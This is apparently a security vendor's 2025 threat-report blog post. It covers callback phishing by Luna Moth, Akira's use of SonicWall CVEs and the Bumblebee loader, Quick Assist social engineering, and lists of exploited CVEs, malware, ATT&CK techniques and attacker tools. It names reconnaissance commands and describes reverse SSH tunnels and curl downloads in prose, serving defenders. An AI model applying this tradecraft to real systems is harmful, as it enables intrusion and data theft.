December 22, 2025 7 Minute Read

As 2025 winds down and cruises into the holiday season, it’s a good time to take a look back and reflect on what took place in the cybersecurity industry. The members of this community know that while every year is not the same, there are trends that tend to stick with us from year to year, making it important to remember what happened so we are ready for what will take place in the coming months.

With that noted, Stroz Friedberg, which is now part of LevelBlue, compiled a report noting how in 2025 threat actors utilized sophisticated social engineering techniques and exploited critical vulnerabilities to target organizations across the United States.

We identified a series of coordinated campaigns and trends throughout the year involving threat actor groups such as Luna Moth and Akira.

These groups leveraged a combination of phishing, impersonation, and exploitation of remote access tools and vulnerabilities. Campaigns often began with a convincing social engineering scheme, such as fake IT support calls or an external sender accessing an internal communication channel, resulting in the deployment of remote access tools, malware, and, at times, ransomware.

The most frequently exploited vulnerabilities observed this year involved network devices and VPN gateways, with attackers consistently seeking to bypass authentication and gain persistent access.

In the first half of the year, we observed attackers using increasingly stealthy tactics such as impersonation to bypass traditional security measures. Some Threat Groups paid external individuals to secure IT roles within target organizations, allowing perpetrators to remain hidden. These evolving strategies often exploited human errors and combined multiple techniques.

LevelBlue’s Incident Readiness and Response team observed three major campaigns and trends that disrupted the traditional threat landscape in 2025:

• The Luna Moth threat actor group used callback phishing campaigns, largely targeting law firms. These campaigns often began with a convincing social engineering scheme, such as fake IT support calls or an external sender accessing an internal communication channel, resulting in the deployment of remote access tools, malware, and, at times, ransomware.
• The Akira threat actor group exploited the SonicWall vulnerability CVE-2024-40766, an improper access control flaw, as well as CVE-2024-53704, which enables the hijacking of an active VPN session. Akira additionally leveraged Bumblebee malware as an initial access tool through SEO poisoning tactics. The Akira group created a lookalike domain to mimic legitimate IT tools. Victims were redirected to malicious websites and were led to install the trojanized installer. Once executed, the installer deploys Bumblebee malware.
• Threat actors exploited Microsoft Quick Assist in sophisticated social engineering campaigns. These attacks are initiated through voice calls or Microsoft Teams messages from compromised external accounts, prompting the use of Quick Assist and resulting in the compromise of the victim’s systems.

As attackers continue to manipulate human behavior, organizations must prioritize behavioral detection over traditional heuristics to stay ahead of emerging threats.

What Were the Trends of 2025?

Trend 1: Luna Moth

LevelBlue linked the Luna Moth group to numerous incidents of data theft and extortion, specifically targeting professional service organizations such as law firms and financial institutions.

Their approach started with a phishing email that impersonated a member of the company’s internal IT or security team. The threat actor directed victims to call a fake helpdesk number. Once the attacker established contact with the victim, they sent an invitation to use remote access tools such as Zoho Assist or Atera. After the victim granted access to their device, the attacker pivoted to data exfiltration either through WinSCP or a renamed version of Rclone.

Once exfiltration was complete, Luna Moth group harassed victim organizations by calling or emailing them to pressure them into paying.

LevelBlue’s investigations into Luna Moth incidents demonstrate a consistent pattern in which phishing and IT impersonation led to remote access, data theft, and eventual extortion. With this progression established, we now shift to the next emerging trend, centered around activity linked to an active threat group.

Figure 1: Luna Moth Data Theft & Extortion Attack Chain.

Trend 2: Akira

In 2025, LevelBlue observed Akira affiliates three times as often as the next most-prevalent threat actor. Two distinct trends in Akira activity were identified this year.

SonicWall Vulnerability

LevelBlue’s investigations found that the Akira threat actor group and its affiliates used two vulnerabilities in SonicWall firewalls to gain initial access to organizations’ environments.

CVE-2024-40766 was published in August 2024, referencing an improper access control flaw in SonicWall firewall appliances stemming from migrations of sixth to seventh generation firewalls. Local user passwords were transferred during migration and not subsequently reset.

Figure 2. SonicWall vulnerability.

CVE-2024-53704 was published in January 2025. This vulnerability exploits an authentication bypass affecting the SSL VPN component of SonicWall firewalls running versions 7.1.x, 7.1.2-7019, and 8.0.0-8035.

Device vulnerabilities provided initial access to targeted environments, establishing a reliable foothold for further activity.

Bumblebee Loader

LevelBlue observed spoofed domains utilized to trick victims into installing a malicious version of RVTools. These sites were designed to appear in search engine results, luring unsuspecting users to download malicious software. Once the malicious installer was executed, the Bumblebee malware was deployed. These intrusions escalated quickly from a single infected host, moving laterally across the environment, harvesting credentials, installing persistent remote access tools, and exfiltrating data using SFTP clients.

The attacks concluded with the deployment of Akira ransomware, encrypting critical systems.

In summary, Akira leveraged spoofed domains as the entry point for malicious software that rapidly escalated to malware deployment, lateral movement, data theft, and eventual ransomware execution. Having outlined the progression of the attack, the next section explores a broader trend relevant to social engineering campaigns and data theft.

Figure 3. Bumblebee load attack chain.

Trend 3: Quick Assist/Teams Call

LevelBlue observed an increase in malicious activity leveraging Microsoft Quick Assist to carry out social engineering campaigns, leading to ransomware detonation.

These attacks typically began with voice calls or Microsoft Teams messages from an external account. In some instances, the threat actor preempted the Teams calls with email bombing, creating a heightened sense of urgency and concern among recipients. The interactions were designed to convince victims that they were receiving technical support from internal IT or security teams.

During the call, the threat actor convinced the victims to launch Quick Assist and share access to their devices. Because Quick Assist runs in the context of the logged-in user, sharing access provided the attacker with the same privileges as the user.

LevelBlue observed subsequent command sequences that collectively demonstrate a methodical approach to post-compromise activity. The initial phase involved extensive reconnaissance, utilizing commands such as tasklist, systeminfo, whoami, net session, nslookup, and ipconfig /all. Threat actors leveraged commands including nltest /dclist and nltest /domain_trusts /all_trusts to enumerate domain controllers and trust relationships, which provided the attackers with valuable insight into organizations’ networks.

LevelBlue also observed the use of the legitimate Windows SSH executable, ssh.exe, with reverse-tunneling flags, which created a covert channel from the compromised host to an external server and bypassed typical inbound firewall restrictions. Download commands utilizing curl.exe were used to retrieve executables, including remote administration tools.

LevelBlue observed numerous persistence mechanisms, including a combination of scheduled task manipulation, registry modifications, and WMI event subscriptions. Attackers used remote access tools such as ScreenConnect and AnyDesk to maintain persistence. File operations were automated using batch scripts that created directories, combined and extracted files, and deleted evidence to evade detection. Threat actors were also observed mapping drives, exfiltrating data, and conducting enumeration through the initial victim host. In at least one instance, the threat actor also deployed Black Basta ransomware using PSExec.

Figure 4. Teams quick assist attack chain.

Let’s Look at the Most Frequently Exploited Vulnerabilities

CVE-2024-40766

CVE-2024-53704

CVE-2024-55591

CVE-2025-0282

CVE-2025-31324

An active exploitation of a critical vulnerability in SAP NetWeaver Visual Composer was first reported in April 2025. This exploit allows attackers to upload and execute arbitrary files on Windows and Linux servers. This vulnerability is associated with Python reverse shells, web shell files, and the download/execution of additional malware (cryptocurrency miners and remote access tools). Attackers use Base64 encoding to obfuscate commands and maintain persistence by uploading malicious JSP files.

This visualization displays the most exploited vulnerabilities throughout 2025, sourced from DFIR investigations conducted by LevelBlue. Percentages represent the proportion of cases in which each vulnerability was identified.

Figure 5. Top 5 exploited vulnerabilities, 2025.

Malware

The graph below illustrates the top ten most frequently observed malware families in 2025, derived from DFIR engagements conducted by LevelBlue. Percentages denote each malware family’s representation across all cases.

Figure 6. Top malware, 2025.

Threat Actors

This graph represents the top ten most active threat actors observed year-to-date in 2025. The data is derived from DFIR investigations conducted by LevelBlue and reflects the percentage of cases in which each threat actor was identified.

Figure 7. Top threat actors, 2025.

Techniques Observed

LevelBlue observed the following techniques across multiple trends described above.

Techniques Observed Across Campaigns, 2025

• T1021.004 SSH
• T1046 Network Service Discovery
• T1059.001 PowerShell
• T1071.001 Web Protocols
• T1105 Ingress Tool Transfer
• T1136.002 Domain Account
• T1219 Remote Access Software
• T1560.001 Archive via Utility
• *SF1562.00c Disable/Modify EDR/AV

Tools

LevelBlue observed an increase in living off the land techniques and social engineering, providing a simpler attack vector. Attackers abused legitimate tools already present in the environment, thereby lowering the chance of being detected by traditional Endpoint Detection and Response (EDR) tools.

This graph represents the top 20 tools observed in 2025 year-to-date. The data is derived from DFIR investigations conducted by LevelBlue and reflects the percentage of cases in which each tool was identified.

Figure 8. Top tools, 2025.

Most Observed Tools by Type:

File Transfer / Synchronization:

• Rclone
• WinSCP
• Filezilla

Remote Access / Support

• Quick Assist
• AnyDesk
• Zoho Assist
• ConnectWise

Network Scanning / Management

• SoftPerfect Network Scanner
• Advanced IP Scanner
• Nmap

Command-line / Scripting / Utilities

• PsExec
• OpenSSH
• curl
• cmD
• Net
• quser
• Nltest
• netstat

Compression / Archiving

• 7-Zip
• WinRAR

Security / Penetration Testing

• Mimikatz
• Impacket

Software / Productivity

• Microsoft Office Outlook Desktop
• Outlook Desktop for Mac
• eM Client
• PerfectData Software

Time to Look Ahead

Recent months saw a rise in sophisticated social engineering campaigns, leading attackers to adopt increasingly stealthy tactics. While traditional threats, such as phishing and vulnerability exploitation, attackers increasingly rely on impersonation to achieve their goals.

These attacks successfully exploited human error and bypassed technical defenses, suggesting that future trends will see attackers continuing to focus on manipulating human behavior to accomplish their objectives. Placing greater emphasis on focused behavioral detection rather than heuristics is necessary to remain vigilant and ahead of threat actors.